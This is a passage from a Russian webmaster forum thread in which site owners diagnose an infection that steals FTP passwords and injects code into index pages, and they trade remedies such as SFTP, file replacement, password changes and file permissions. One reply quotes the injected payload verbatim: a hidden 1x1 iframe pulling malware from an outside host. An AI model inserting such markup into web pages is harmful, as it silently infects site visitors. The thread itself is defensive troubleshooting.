- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
через sftp конектиться попробуйте если есть на хостинге
Да, кстати, через SFTP пока еще таких проблем нет, в качестве клиента рекомендую WinSCP, у него же есть плагин к FAR
Работает вирус по стандартной схеме: как-то достает пароль к ФТП, после чего на индексные страницы добавляет <iframe src="http://yanbex.com/yandex/in.cgi?2" width=1 height=1 style="visibility:hidden"></iframe>
Обычно вирус цепляют к .htaccess, полностью удалите его, замените со своего компа.
Либо к индексным файлам, лечение аналогичное полное удаление, замена файла
Пароль к ФТП сменить.
если дыра на хостинге, дополнительно можно удалить права на запись индехфайлов из панели.
Хостинг mchost.ru
в тех. поддержке сказали, что не их вина 99%:)
Касперский ничего не находит на компе.
Попробовал так: загружяю файлы и сразу меняю пароль к фтп в панели, его кладу в блокнот. тоесть вообще им не пользовался. Посмотрим результат...
У меня похожая ситуация была, оказалось что какой то вирь воровал пароли из TC.
А я еще голову ломал, как такое может быть ? Пароли наверное раз 6 менял, а все без толку.
В общем перешел на WinSCP и все стало нормально.
Попробовал так: загружяю файлы и сразу меняю пароль к фтп в панели, его кладу в блокнот. тоесть вообще им не пользовался. Посмотрим результат...
Не надо так мучатся! Ставите на файл индексной страницы права 444 и все в порядке! Вирус код вставляет в в файлы с именем index с любым разрешением. Вот. Была аналогичная проблема - так причину и не нашли. Решилось все установлением на сервере блокировщика фтп по айпишнику. Удобная штука все-таки!
pianist, а у Вас FTP-менеджер не Total Comander (вроде так пишется)? Если он - то он и проблема.
Вот, если что, ссылка нормальная на информацию по минимальной защите сайта: http://www.jino.ru/support/manuals/security.html
SFTP
Сорри за оффтоп, а его должен поддерживать хостинг или как можно через него?
Стоит Total Comander, но через него я заливаю только на файлообменники. А на сайты мелкие файлы через проводник IE.
Ладно, буду примменять сейчас советы прочитаные здесь.
Сорри за оффтоп, а его должен поддерживать хостинг или как можно через него?
если есть доступ по ssh к хосту, то в большинстве случаев это означает, что у вас есть и доступ по sftp .
Кстати, некоторое время назад наткнулся на интересное поведение вируса на одном сайте. Может я что-то пропустил, но раньше такого не встречал - вирус пишется не в конец файла как обычно, а находит место, где находятся скрипты счётчиков (а может просто смотрит тег <script>) и приписывается после них. А на фоне ливеинтернетовского счётчика я и не сразу заметил.
Этот iframe подгружает вирус, который, правда, ловит Касперский(как другие антивирусы не знаю).
не факт, что там всего один вирус, и остальные антивирус ловит...